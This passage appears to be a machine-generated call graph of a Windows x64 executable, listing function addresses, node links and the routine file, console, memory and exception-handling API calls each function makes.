7ff6ee78a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38462->38477 38464 7ff6ee78a6ca 38478 7ff6ee78a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38464->38478 38468 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38467->38468 38469 7ff6ee77c0f1 38468->38469 38469->38445 38471 7ff6ee749cd7 38470->38471 38472 7ff6ee792d8b QueryPerformanceCounter 38470->38472 38471->38312 38472->38471 38474 7ff6ee779dbc 38473->38474 38474->38474 38475 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38474->38475 38476 7ff6ee779f40 38475->38476 38476->38450 38477->38464 38480 7ff6ee73a4ea 38479->38480 38481 7ff6ee73a4ee 38480->38481 38670 7ff6ee752440 38480->38670 38481->38320 38484 7ff6ee73abbf setbuf 38483->38484 38485 7ff6ee768c1c 48 API calls 38484->38485 38491 7ff6ee73abf5 38485->38491 38486 7ff6ee73aca7 38487 7ff6ee73b4af 38486->38487 38488 7ff6ee73acbf 38486->38488 38492 7ff6ee73b4ff 38487->38492 38494 7ff6ee752574 126 API calls 38487->38494 38489 7ff6ee73acc8 38488->38489 38490 7ff6ee73b35c 38488->38490 38497 7ff6ee73acdd 38489->38497 38500 7ff6ee73ad60 38489->38500 38537 7ff6ee73aea7 38489->38537 38496 7ff6ee768eec 48 API calls 38490->38496 38491->38486 38491->38487 38493 7ff6ee749be0 14 API calls 38491->38493 38699 7ff6ee7672c0 38492->38699 38498 7ff6ee73ac34 38493->38498 38494->38492 38499 7ff6ee73b395 38496->38499 38501 7ff6ee73ad68 38497->38501 38502 7ff6ee73ace6 38497->38502 38503 7ff6ee7490b8 75 API calls 38498->38503 38504 7ff6ee73b3ad 38499->38504 38698 7ff6ee739e2c 48 API calls 38499->38698 38507 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38500->38507 38505 7ff6ee768eec 48 API calls 38501->38505 38502->38500 38680 7ff6ee768eec 38502->38680 38509 7ff6ee73ac8f 38503->38509 38508 7ff6ee768eec 48 API calls 38504->38508 38510 7ff6ee73ad9c 38505->38510 38511 7ff6ee73b52b 38507->38511 38512 7ff6ee73b3d4 38508->38512 38509->38486 38517 7ff6ee752574 126 API calls 38509->38517 38514 7ff6ee768eec 48 API calls 38510->38514 38511->38330 38515 7ff6ee73b3e6 38512->38515 38519 7ff6ee768eec 48 API calls 38512->38519 38518 7ff6ee73ada9 38514->38518 38522 7ff6ee768eec 48 API calls 38515->38522 38517->38486 38521 7ff6ee768eec 48 API calls 38518->38521 38519->38515 38520 7ff6ee768eec 48 API calls 38523 7ff6ee73ad31 38520->38523 38524 7ff6ee73adb5 38521->38524 38525 7ff6ee73b451 38522->38525 38526 7ff6ee768eec 48 API calls 38523->38526 38527 7ff6ee768eec 48 API calls 38524->38527 38528 7ff6ee73b471 38525->38528 38536 7ff6ee768eec 48 API calls 38525->38536 38529 7ff6ee73ad46 38526->38529 38531 7ff6ee73adc2 38527->38531 38530 7ff6ee73b486 38528->38530 38533 7ff6ee768e3c 48 API calls 38528->38533 38532 7ff6ee768f94 126 API calls 38529->38532 38534 7ff6ee768f94 126 API calls 38530->38534 38535 7ff6ee768d00 48 API calls 38531->38535 38532->38500 38533->38530 38534->38500 38539 7ff6ee73adcf 38535->38539 38536->38528 38538 7ff6ee73afda 38537->38538 38688 7ff6ee739b64 48 API calls _UnwindNestedFrames 38537->38688 38546 7ff6ee73aff2 38538->38546 38689 7ff6ee739d98 48 API calls 38538->38689 38541 7ff6ee7490b8 75 API calls 38539->38541 38543 7ff6ee73ae22 38541->38543 38544 7ff6ee768e3c 48 API calls 38543->38544 38545 7ff6ee73ae33 38544->38545 38547 7ff6ee768e3c 48 API calls 38545->38547 38548 7ff6ee73b02b 38546->38548 38690 7ff6ee739efc 48 API calls _UnwindNestedFrames 38546->38690 38550 7ff6ee73ae48 38547->38550 38549 7ff6ee73b0af 38548->38549 38691 7ff6ee73a2c8 48 API calls 38548->38691 38553 7ff6ee73b0c8 38549->38553 38692 7ff6ee73a1a0 48 API calls 2 library calls 38549->38692 38556 7ff6ee779ce4 8 API calls 38550->38556 38554 7ff6ee73b0e2 38553->38554 38693 7ff6ee73a350 48 API calls _UnwindNestedFrames 38553->38693 38559 7ff6ee768eec 48 API calls 38554->38559 38558 7ff6ee73ae60 38556->38558 38560 7ff6ee779b70 8 API calls 38558->38560 38561 7ff6ee73b0fc 38559->38561 38562 7ff6ee73ae6d 38560->38562 38563 7ff6ee768eec 48 API calls 38561->38563 38564 7ff6ee768e3c 48 API calls 38562->38564 38565 7ff6ee73b109 38563->38565 38566 7ff6ee73ae80 38564->38566 38567 7ff6ee73b11f 38565->38567 38569 7ff6ee768eec 48 API calls 38565->38569 38568 7ff6ee768f94 126 API calls 38566->38568 38684 7ff6ee768e94 38567->38684 38568->38500 38569->38567 38572 7ff6ee768eec 48 API calls 38573 7ff6ee73b147 38572->38573 38574 7ff6ee768e94 48 API calls 38573->38574 38575 7ff6ee73b15f 38574->38575 38576 7ff6ee768eec 48 API calls 38575->38576 38579 7ff6ee73b16c 38576->38579 38577 7ff6ee73b18a 38578 7ff6ee73b1a9 38577->38578 38695 7ff6ee768d88 48 API calls 38577->38695 38581 7ff6ee768e94 48 API calls 38578->38581 38579->38577 38694 7ff6ee768d88 48 API calls 38579->38694 38583 7ff6ee73b1bc 38581->38583 38584 7ff6ee768eec 48 API calls 38583->38584 38585 7ff6ee73b1d6 38584->38585 38587 7ff6ee73b1e9 38585->38587 38696 7ff6ee73c3c8 CharLowerW CharUpperW 38585->38696 38587->38587 38588 7ff6ee768eec 48 API calls 38587->38588 38589 7ff6ee73b21f 38588->38589 38590 7ff6ee768e3c 48 API calls 38589->38590 38591 7ff6ee73b230 38590->38591 38592 7ff6ee73b247 38591->38592 38593 7ff6ee768e3c 48 API calls 38591->38593 38594 7ff6ee768f94 126 API calls 38592->38594 38593->38592 38595 7ff6ee73b278 38594->38595 38595->38500 38697 7ff6ee7670d8 4 API calls 2 library calls 38595->38697 38720 7ff6ee768f28 38597->38720 38600 7ff6ee7490b8 38601 7ff6ee749123 38600->38601 38613 7ff6ee7491a9 38600->38613 38601->38613 38738 7ff6ee777e74 38601->38738 38602 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38604 7ff6ee73b66e 38602->38604 38616 7ff6ee752574 38604->38616 38606 7ff6ee77d840 WideCharToMultiByte 38607 7ff6ee749157 38606->38607 38608 7ff6ee74916a 38607->38608 38609 7ff6ee7491c4 38607->38609 38607->38613 38610 7ff6ee7491ab 38608->38610 38611 7ff6ee74916f 38608->38611 38757 7ff6ee749338 12 API calls _UnwindNestedFrames 38609->38757 38756 7ff6ee74951c 71 API calls _UnwindNestedFrames 38610->38756 38611->38613 38742 7ff6ee7498b0 38611->38742 38613->38602 38617 7ff6ee7525a5 38616->38617 38622 7ff6ee75259e 38616->38622 38618 7ff6ee7525ab GetStdHandle 38617->38618 38630 7ff6ee7525ba 38617->38630 38618->38630 38619 7ff6ee752619 WriteFile 38619->38630 38620 7ff6ee7525cf WriteFile 38621 7ff6ee75260b 38620->38621 38620->38630 38621->38620 38621->38630 38622->38327 38623 7ff6ee752658 GetLastError 38623->38630 38625 7ff6ee752684 SetLastError 38625->38630 38628 7ff6ee752721 38857 7ff6ee74cf14 10 API calls 38628->38857 38630->38619 38630->38620 38630->38622 38630->38623 38630->38628 38854 7ff6ee753144 9 API calls 2 library calls 38630->38854 38855 7ff6ee74cf34 10 API calls 38630->38855 38856 7ff6ee74c95c 126 API calls 38630->38856 38632 7ff6ee73161c 48 API calls 38631->38632 38633 7ff6ee73b719 38632->38633 38634 7ff6ee768d38 48 API calls 38633->38634 38634->38351 38635->38353 38636->38354 38637->38356 38639 7ff6ee769131 38638->38639 38640 7ff6ee768fcf 38638->38640 38639->38330 38647 7ff6ee76905d 38640->38647 38858 7ff6ee74ca6c 48 API calls 2 library calls 38640->38858 38641 7ff6ee73161c 48 API calls 38642 7ff6ee7690e0 38641->38642 38642->38639 38643 7ff6ee752574 126 API calls 38642->38643 38643->38639 38645 7ff6ee76904c 38859 7ff6ee74ca40 61 API calls _CxxThrowException 38645->38859 38647->38641 38647->38642 38648->38362 38650 7ff6ee73b8f8 CharToOemA 38649->38650 38650->38371 38651->38366 38652->38372 38653->38374 38654->38376 38655->38378 38656->38382 38657->38383 38658->38386 38659->38392 38660->38394 38661->38397 38662->38395 38664 7ff6ee73161c 48 API calls 38663->38664 38665 7ff6ee73baf2 38664->38665 38665->38401 38665->38403 38665->38407 38666->38340 38667->38343 38668->38346 38669->38329 38671 7ff6ee75246a SetFilePointer 38670->38671 38672 7ff6ee752454 38670->38672 38673 7ff6ee7524ad 38671->38673 38674 7ff6ee75248d GetLastError 38671->38674 38672->38673 38678 7ff6ee74cd00 10 API calls 38672->38678 38673->38481 38674->38673 38676 7ff6ee752497 38674->38676 38676->38673 38679 7ff6ee74cd00 10 API calls 38676->38679 38681 7ff6ee768efc 38680->38681 38682 7ff6ee768d00 48 API calls 38681->38682 38683 7ff6ee73ad24 38681->38683 38682->38681 38683->38520 38685 7ff6ee768eac 38684->38685 38686 7ff6ee768d00 48 API calls 38685->38686 38687 7ff6ee73b137 38685->38687 38686->38685 38687->38572 38688->38538 38689->38546 38690->38548 38691->38549 38692->38553 38693->38554 38694->38577 38695->38578 38696->38587 38697->38500 38698->38504 38700 7ff6ee7672dd 38699->38700 38701 7ff6ee767304 38700->38701 38703 7ff6ee78a480 38700->38703 38701->38500 38706 7ff6ee78a444 38703->38706 38704 7ff6ee78a47a 38704->38701 38706->38704 38709 7ff6ee7936c0 38706->38709 38712 7ff6ee78b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38706->38712 38713 7ff6ee78b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38706->38713 38714 7ff6ee793700 38709->38714 38719 7ff6ee796938 EnterCriticalSection 38714->38719 38716 7ff6ee79370d 38717 7ff6ee796998 fflush LeaveCriticalSection 38716->38717 38718 7ff6ee7936d2 38717->38718 38718->38706 38723 7ff6ee73161c 38720->38723 38722 7ff6ee73b601 38722->38327 38722->38329 38722->38600 38724 7ff6ee731640 38723->38724 38733 7ff6ee7316aa memcpy_s 38723->38733 38725 7ff6ee73166d 38724->38725 38734 7ff6ee74ca6c 48 API calls 2 library calls 38724->38734 38728 7ff6ee7316d4 38725->38728 38729 7ff6ee73168e 38725->38729 38727 7ff6ee731661 38735 7ff6ee74cb64 8 API calls 38727->38735 38728->38733 38737 7ff6ee74cb64 8 API calls 38728->38737 38729->38733 38736 7ff6ee74cb64 8 API calls 38729->38736 38733->38722 38734->38727 38739 7ff6ee749143 38738->38739 38740 7ff6ee777e95 38738->38740 38739->38606 38758 7ff6ee777ec8 38740->38758 38743 7ff6ee749b45 38742->38743 38747 7ff6ee749920 38742->38747 38744 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38743->38744 38745 7ff6ee749b61 38744->38745 38745->38613 38748 7ff6ee74996d 38747->38748 38749 7ff6ee749b75 38747->38749 38790 7ff6ee777da8 38747->38790 38748->38748 38797 7ff6ee74a0f4 38748->38797 38750 7ff6ee777f24 68 API calls 38749->38750 38753 7ff6ee749acb 38750->38753 38752 7ff6ee7499d0 38752->38752 38813 7ff6ee777f24 38752->38813 38753->38743 38753->38753 38827 7ff6ee774ea8 8 API calls _UnwindNestedFrames 38753->38827 38756->38613 38757->38613 38760 7ff6ee777efa memcpy_s 38758->38760 38759 7ff6ee777fb5 38763 7ff6ee77805c GetCurrentProcessId 38759->38763 38766 7ff6ee777ff1 38759->38766 38760->38759 38772 7ff6ee77b3f0 38760->38772 38764 7ff6ee778034 38763->38764 38764->38739 38765 7ff6ee777f7e GetProcAddressForCaller GetProcAddress 38765->38759 38766->38764 38781 7ff6ee74ca6c 48 API calls 2 library calls 38766->38781 38768 7ff6ee77801f 38782 7ff6ee74cda4 10 API calls 2 library calls 38768->38782 38770 7ff6ee778027 38783 7ff6ee74ca40 61 API calls _CxxThrowException 38770->38783 38784 7ff6ee78a5a0 38772->38784 38774 7ff6ee77b3fc GetSystemDirectoryW 38775 7ff6ee77b42c 38774->38775 38776 7ff6ee77b428 38774->38776 38786 7ff6ee7648bc 38775->38786 38779 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38776->38779 38780 7ff6ee777f72 38779->38780 38780->38759 38780->38765 38781->38768 38782->38770 38783->38764 38785 7ff6ee78a5cb 38784->38785 38785->38774 38785->38785 38787 7ff6ee7648cb setbuf 38786->38787 38788 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38787->38788 38789 7ff6ee76493a LoadLibraryW 38788->38789 38789->38776 38791 7ff6ee777e74 68 API calls 38790->38791 38792 7ff6ee777ddc 38791->38792 38793 7ff6ee777e74 68 API calls 38792->38793 38794 7ff6ee777def 38793->38794 38795 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38794->38795 38796 7ff6ee777e43 38795->38796 38796->38747 38800 7ff6ee74a15c memcpy_s 38797->38800 38798 7ff6ee74a358 38850 7ff6ee78a774 8 API calls __report_securityfailure 38798->38850 38800->38798 38801 7ff6ee74a352 38800->38801 38803 7ff6ee74a34d 38800->38803 38804 7ff6ee74a192 38800->38804 38849 7ff6ee78a774 8 API calls __report_securityfailure 38801->38849 38802 7ff6ee74a35e 38848 7ff6ee78a774 8 API calls __report_securityfailure 38803->38848 38828 7ff6ee749dd8 38804->38828 38808 7ff6ee74a1d9 38809 7ff6ee749dd8 8 API calls 38808->38809 38810 7ff6ee74a2f1 38808->38810 38809->38808 38811 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38810->38811 38812 7ff6ee74a33b 38811->38812 38812->38752 38814 7ff6ee777f5e 38813->38814 38819 7ff6ee777fb5 38813->38819 38815 7ff6ee77b3f0 10 API calls 38814->38815 38814->38819 38816 7ff6ee777f72 38815->38816 38816->38819 38820 7ff6ee777f7e GetProcAddressForCaller GetProcAddress 38816->38820 38817 7ff6ee77805c GetCurrentProcessId 38818 7ff6ee778034 38817->38818 38818->38753 38819->38817 38821 7ff6ee777ff1 38819->38821 38820->38819 38821->38818 38851 7ff6ee74ca6c 48 API calls 2 library calls 38821->38851 38823 7ff6ee77801f 38852 7ff6ee74cda4 10 API calls 2 library calls 38823->38852 38825 7ff6ee778027 38853 7ff6ee74ca40 61 API calls _CxxThrowException 38825->38853 38827->38743 38829 7ff6ee749e46 38828->38829 38835 7ff6ee749e6e memcpy_s 38828->38835 38830 7ff6ee779ce4 8 API calls 38829->38830 38831 7ff6ee749e5e 38830->38831 38832 7ff6ee779b70 8 API calls 38831->38832 38832->38835 38833 7ff6ee749e85 38834 7ff6ee779ce4 8 API calls 38833->38834 38836 7ff6ee749f97 38834->38836 38835->38833 38837 7ff6ee779ce4 8 API calls 38835->38837 38838 7ff6ee779b70 8 API calls 38836->38838 38837->38833 38839 7ff6ee749fa8 memcpy_s 38838->38839 38840 7ff6ee749fb4 38839->38840 38842 7ff6ee779ce4 8 API calls 38839->38842 38841 7ff6ee779ce4 8 API calls 38840->38841 38843 7ff6ee74a0bb 38841->38843 38842->38840 38844 7ff6ee779b70 8 API calls 38843->38844 38845 7ff6ee74a0c9 38844->38845 38846 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38845->38846 38847 7ff6ee74a0d8 38846->38847 38847->38808 38848->38801 38849->38798 38850->38802 38851->38823 38852->38825 38853->38818 38854->38625 38856->38630 38858->38645 38859->38647 38862->38436 38863 7ff6ee799c74 38864 7ff6ee799c7c 38863->38864 38865 7ff6ee799cbb 38864->38865 38866 7ff6ee799cac 38864->38866 38867 7ff6ee799cc5 38865->38867 38885 7ff6ee79ce08 32 API calls 2 library calls 38865->38885 38884 7ff6ee794f3c 15 API calls memcpy_s 38866->38884 38872 7ff6ee794b8c 38867->38872 38871 7ff6ee799cb1 memcpy_s 38873 7ff6ee794ba1 38872->38873 38874 7ff6ee794bab 38872->38874 38886 7ff6ee794ab4 38873->38886 38876 7ff6ee794bb0 38874->38876 38882 7ff6ee794bb7 __vcrt_getptd_noexit 38874->38882 38893 7ff6ee794a74 38876->38893 38878 7ff6ee794bf6 38899 7ff6ee794f3c 15 API calls memcpy_s 38878->38899 38880 7ff6ee794ba9 38880->38871 38881 7ff6ee794be0 RtlReAllocateHeap 38881->38880 38881->38882 38882->38878 38882->38881 38883 7ff6ee7936c0 new 2 API calls 38882->38883 38883->38882 38884->38871 38885->38867 38887 7ff6ee794aff 38886->38887 38891 7ff6ee794ac3 __vcrt_getptd_noexit 38886->38891 38900 7ff6ee794f3c 15 API calls memcpy_s 38887->38900 38889 7ff6ee794ae6 RtlAllocateHeap 38890 7ff6ee794afd 38889->38890 38889->38891 38890->38880 38891->38887 38891->38889 38892 7ff6ee7936c0 new 2 API calls 38891->38892 38892->38891 38894 7ff6ee794a79 RtlReleasePrivilege 38893->38894 38898 7ff6ee794aa9 __free_lconv_num 38893->38898 38895 7ff6ee794a94 38894->38895 38894->38898 38901 7ff6ee794f3c 15 API calls memcpy_s 38895->38901 38897 7ff6ee794a99 GetLastError 38897->38898 38898->38880 38899->38880 38900->38890 38901->38897 38902 7ff6ee7382f0 38903 7ff6ee738306 38902->38903 38915 7ff6ee73836f 38902->38915 38904 7ff6ee738324 38903->38904 38908 7ff6ee738371 38903->38908 38903->38915 38930 7ff6ee752414 61 API calls 38904->38930 38906 7ff6ee738347 38931 7ff6ee751998 138 API calls 38906->38931 38908->38915 38939 7ff6ee751998 138 API calls 38908->38939 38910 7ff6ee73835e 38932 7ff6ee7518ac 38910->38932 38913 7ff6ee73b540 147 API calls 38914 7ff6ee73854f 38913->38914 38916 7ff6ee738578 38914->38916 38918 7ff6ee73b540 147 API calls 38914->38918 38925 7ff6ee73a410 38915->38925 38917 7ff6ee73b540 147 API calls 38916->38917 38922 7ff6ee73858f 38917->38922 38918->38916 38919 7ff6ee738634 38920 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38919->38920 38921 7ff6ee738663 38920->38921 38922->38919 38940 7ff6ee739628 175 API calls 38922->38940 38941 7ff6ee767a68 38925->38941 38928 7ff6ee73853a 38928->38913 38930->38906 38931->38910 38933 7ff6ee7518ca 38932->38933 38934 7ff6ee7518db 38932->38934 38933->38934 38935 7ff6ee7518d6 38933->38935 38936 7ff6ee7518de 38933->38936 38934->38915 38961 7ff6ee751c24 38935->38961 38966 7ff6ee751930 38936->38966 38939->38915 38940->38919 38943 7ff6ee767a8d 38941->38943 38948 7ff6ee73a434 38941->38948 38942 7ff6ee767aaf 38944 7ff6ee7522e0 12 API calls 38942->38944 38942->38948 38943->38942 38954 7ff6ee767340 157 API calls 38943->38954 38946 7ff6ee767adf 38944->38946 38947 7ff6ee752440 12 API calls 38946->38947 38947->38948 38948->38928 38949 7ff6ee7522e0 38948->38949 38955 7ff6ee7520b4 38949->38955 38952 7ff6ee752307 38952->38928 38954->38942 38958 7ff6ee752130 38955->38958 38959 7ff6ee7520d0 38955->38959 38956 7ff6ee752102 SetFilePointer 38957 7ff6ee752126 GetLastError 38956->38957 38956->38958 38957->38958 38958->38952 38960 7ff6ee74cd00 10 API calls 38958->38960 38959->38956 38962 7ff6ee751c3b 38961->38962 38963 7ff6ee751c37 38961->38963 38962->38963 38964 7ff6ee751c5d 38962->38964 38963->38934 38972 7ff6ee752d6c 12 API calls 2 library calls 38964->38972 38967 7ff6ee75194c 38966->38967 38969 7ff6ee751964 38966->38969 38967->38969 38970 7ff6ee751958 FindCloseChangeNotification 38967->38970 38968 7ff6ee751988 38968->38934 38969->38968 38973 7ff6ee74c9d0 10 API calls 38969->38973 38970->38969 38972->38963 38973->38968 38974 7ff6ee733e71 38975 7ff6ee733e89 38974->38975 38976 7ff6ee733e81 38974->38976 38978 7ff6ee733edd 38975->38978 38979 7ff6ee733ea3 38975->38979 38985 7ff6ee789a14 49 API calls 38976->38985 38980 7ff6ee78a610 _UnwindNestedFrames 8 API calls 38978->38980 38986 7ff6ee75331c 48 API calls 2 library calls 38979->38986 38982 7ff6ee733eef 38980->38982 38983 7ff6ee733eab 38983->38978 38987 7ff6ee7363e8 8 API calls 2 library calls 38983->38987 38985->38975 38986->38983 38987->38978 38988 7ff6ee731884 39120 7ff6ee7634e4 38988->39120 38991 7ff6ee7634e4 CompareStringW 38993 7ff6ee7318a6 38991->38993 38992 7ff6ee731926 38994 7ff6ee73195b 38992->38994 39184 7ff6ee763f98 63 API calls 2 library calls 38992->39184 38995 7ff6ee7634e4 CompareStringW 38993->38995 39001 7ff6ee7318b9 38993->39001 39002 7ff6ee731970 38994->39002 39185 7ff6ee752ed8 100 API calls 3 library calls 38994->39185 38995->39001 38999 7ff6ee731915 39183 7ff6ee74ca40 61 API calls _CxxThrowException 38999->39183 39001->38992 39182 7ff6ee731168 8 API calls 2 library calls 39001->39182 39003 7ff6ee7319b8 39002->39003 39186 7ff6ee7749f4 48 API calls 39002->39186 39124 7ff6ee735450 39003->39124 39005 7ff6ee7319b0 39187 7ff6ee748444 54 API calls fflush 39005->39187 39011 7ff6ee7372c4 76 API calls 39018 7ff6ee731a12 39011->39018 39012 7ff6ee731ae6 39158 7ff6ee737514 39012->39158 39013 7ff6ee731b04 39162 7ff6ee746c94 39013->39162 39016 7ff6ee731af2 39017 7ff6ee737514 72 API calls 39016->39017 39019 7ff6ee731aff 39017->39019 39018->39012 39018->39013 39020 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39019->39020 39021 7ff6ee732f97 39020->39021 39022 7ff6ee731b13 39178 7ff6ee737148 39022->39178 39024 7ff6ee731c71 39025 7ff6ee731ca7 39024->39025 39026 7ff6ee7363e8 8 API calls 39024->39026 39028 7ff6ee731ce4 39025->39028 39029 7ff6ee731cd5 39025->39029 39027 7ff6ee731c91 39026->39027 39030 7ff6ee7349b8 99 API calls 39027->39030 39032 7ff6ee78a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39028->39032 39031 7ff6ee78a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39029->39031 39033 7ff6ee731c9d 39030->39033 39035 7ff6ee731cee 39031->39035 39032->39035 39034 7ff6ee7363e8 8 API calls 39033->39034 39034->39025 39036 7ff6ee731d50 39035->39036 39038 7ff6ee77de30 72 API calls 39035->39038 39037 7ff6ee78a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39036->39037 39039 7ff6ee731d62 39037->39039 39038->39036 39040 7ff6ee77dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39039->39040 39041 7ff6ee731d7b 39039->39041 39040->39041 39042 7ff6ee782bcc 66 API calls 39041->39042 39043 7ff6ee731dba 39042->39043 39116 7ff6ee75ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39043->39116 39044 7ff6ee731e1c 39046 7ff6ee7310c0 8 API calls 39044->39046 39048 7ff6ee731e5d 39044->39048 39045 7ff6ee731dde std::bad_alloc::bad_alloc 39045->39044 39047 7ff6ee78ba34 _CxxThrowException RtlPcToFileHeader RaiseException 39045->39047 39046->39048 39047->39044 39049 7ff6ee73a410 159 API calls 39048->39049 39088 7ff6ee731ef4 39048->39088 39049->39088 39050 7ff6ee732d0c 39052 7ff6ee77de30 72 API calls 39050->39052 39060 7ff6ee732d21 39050->39060 39051 7ff6ee732ccc 39051->39050 39115 7ff6ee758c80 72 API calls 39051->39115 39052->39060 39053 7ff6ee732d86 39061 7ff6ee7749f4 48 API calls 39053->39061 39085 7ff6ee732dd0 39053->39085 39054 7ff6ee7749f4 48 API calls 39091 7ff6ee732005 39054->39091 39055 7ff6ee756688 48 API calls 39055->39088 39056 7ff6ee77b6d0 73 API calls 39056->39091 39057 7ff6ee748444 54 API calls 39057->39091 39058 7ff6ee735e70 169 API calls 39058->39091 39059 7ff6ee7380e4 192 API calls 39059->39085 39060->39053 39063 7ff6ee7749f4 48 API calls 39060->39063 39065 7ff6ee732d9e 39061->39065 39062 7ff6ee73a504 208 API calls 39062->39085 39067 7ff6ee732d6c 39063->39067 39064 7ff6ee735928 237 API calls 39064->39091 39069 7ff6ee748444 54 API calls 39065->39069 39066 7ff6ee757c7c 127 API calls 39066->39085 39071 7ff6ee7749f4 48 API calls 39067->39071 39068 7ff6ee73a410 159 API calls 39068->39088 39070 7ff6ee732da6 39069->39070 39079 7ff6ee751c24 12 API calls 39070->39079 39075 7ff6ee732d79 39071->39075 39072 7ff6ee74e21c 63 API calls 39072->39091 39073 7ff6ee731168 8 API calls 39073->39085 39074 7ff6ee73b540 147 API calls 39074->39088 39077 7ff6ee748444 54 API calls 39075->39077 39076 7ff6ee73e6c8 157 API calls 39076->39088 39077->39053 39078 7ff6ee7565b4 48 API calls 39078->39088 39079->39085 39080 7ff6ee73a4d0 12 API calls 39080->39088 39081 7ff6ee77ae50 71 API calls 39087 7ff6ee732e39 39081->39087 39082 7ff6ee754554 16 API calls 39082->39088 39083 7ff6ee751998 138 API calls 39083->39088 39084 7ff6ee7333b4 64 API calls 39084->39085 39085->39059 39085->39062 39085->39066 39085->39073 39085->39084 39085->39087 39090 7ff6ee736188 231 API calls 39085->39090 39093 7ff6ee733f74 138 API calls 39085->39093 39096 7ff6ee76ba9c 195 API calls 39085->39096 39097 7ff6ee7749f4 48 API calls 39085->39097 39099 7ff6ee748444 54 API calls 39085->39099 39086 7ff6ee735db4 46 API calls 39086->39088 39087->39081 39087->39085 39089 7ff6ee74ca40 61 API calls 39087->39089 39088->39051 39088->39055 39088->39068 39088->39074 39088->39076 39088->39078 39088->39080 39088->39082 39088->39083 39088->39086 39088->39091 39092 7ff6ee751930 11 API calls 39088->39092 39095 7ff6ee757c7c 127 API calls 39088->39095 39098 7ff6ee735004 49 API calls 39088->39098 39100 7ff6ee751e80 15 API calls 39088->39100 39101 7ff6ee731168 8 API calls 39088->39101 39102 7ff6ee77d48c 58 API calls 39088->39102 39103 7ff6ee73571c 12 API calls 39088->39103 39104 7ff6ee735e70 169 API calls 39088->39104 39105 7ff6ee77c0a8 10 API calls 39088->39105 39106 7ff6ee749be0 14 API calls 39088->39106 39107 7ff6ee756378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39088->39107 39108 7ff6ee7697f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39088->39108 39109 7ff6ee74cbd0 75 API calls 39088->39109 39110 7ff6ee7518ac 15 API calls 39088->39110 39111 7ff6ee755c0c 237 API calls 39088->39111 39112 7ff6ee755d40 237 API calls 39088->39112 39113 7ff6ee736114 216 API calls 39088->39113 39114 7ff6ee755708 237 API calls 39088->39114 39117 7ff6ee75a250 237 API calls 39088->39117 39118 7ff6ee740d60 237 API calls 39088->39118 39119 7ff6ee75aae0 237 API calls 39088->39119 39089->39085 39090->39085 39091->39054 39091->39056 39091->39057 39091->39058 39091->39064 39091->39072 39091->39088 39094 7ff6ee73b540 147 API calls 39091->39094 39092->39088 39093->39085 39094->39091 39095->39088 39096->39085 39097->39085 39098->39088 39099->39085 39100->39088 39101->39088 39102->39088 39103->39088 39104->39088 39105->39088 39106->39088 39107->39088 39108->39088 39109->39088 39110->39088 39111->39088 39112->39088 39113->39088 39114->39088 39115->39050 39116->39045 39117->39088 39118->39091 39119->39091 39121 7ff6ee7634f6 39120->39121 39122 7ff6ee731893 39121->39122 39188 7ff6ee77dac0 CompareStringW 39121->39188 39122->38991 39122->39001 39125 7ff6ee73546f setbuf 39124->39125 39127 7ff6ee73554a memcpy_s 39125->39127 39142 7ff6ee735588 memcpy_s 39125->39142 39128 7ff6ee77c0a8 10 API calls 39127->39128 39130 7ff6ee735576 39128->39130 39129 7ff6ee735583 39218 7ff6ee736eb8 39129->39218 39133 7ff6ee73681c 54 API calls 39130->39133 39133->39129 39134 7ff6ee7356e9 39225 7ff6ee776f68 39134->39225 39136 7ff6ee7356f6 39137 7ff6ee78a610 _UnwindNestedFrames 8 API calls 39136->39137 39138 7ff6ee7319df 39137->39138 39144 7ff6ee7372c4 39138->39144 39142->39129 39189 7ff6ee733210 39142->39189 39195 7ff6ee747088 39142->39195 39199 7ff6ee73681c 39142->39199 39210 7ff6ee777a24 39142->39210 39229 7ff6ee73571c 39142->39229 39237 7ff6ee744380 14 API calls 39142->39237 39145 7ff6ee7372eb 39144->39145 39347 7ff6ee7488dc 39145->39347 39147 7ff6ee737302 39351 7ff6ee76915c 39147->39351 39149 7ff6ee73730f 39363 7ff6ee767044 39149->39363 39152 7ff6ee78a444 new 4 API calls 39153 7ff6ee7373e3 39152->39153 39155 7ff6ee7373f5 memcpy_s 39153->39155 39368 7ff6ee75894c 39153->39368 39156 7ff6ee749be0 14 API calls 39155->39156 39157 7ff6ee731a01 39156->39157 39157->39011 39159 7ff6ee737539 39158->39159 39394 7ff6ee76922c 39159->39394 39163 7ff6ee746cbc 39162->39163 39164 7ff6ee746d45 39162->39164 39166 7ff6ee746cd9 39163->39166 39408 7ff6ee769f78 8 API calls 2 library calls 39163->39408 39165 7ff6ee746d83 39164->39165 39168 7ff6ee746d69 39164->39168 39413 7ff6ee769f78 8 API calls 2 library calls 39164->39413 39165->39022 39167 7ff6ee746cf3 39166->39167 39409 7ff6ee769f78 8 API calls 2 library calls 39166->39409 39171 7ff6ee746d0d 39167->39171 39410 7ff6ee769f78 8 API calls 2 library calls 39167->39410 39168->39165 39414 7ff6ee769f78 8 API calls 2 library calls 39168->39414 39175 7ff6ee746d2b 39171->39175 39411 7ff6ee769f78 8 API calls 2 library calls 39171->39411 39175->39165 39412 7ff6ee769f78 8 API calls 2 library calls 39175->39412 39179 7ff6ee737167 39178->39179 39180 7ff6ee737162 39178->39180 39415 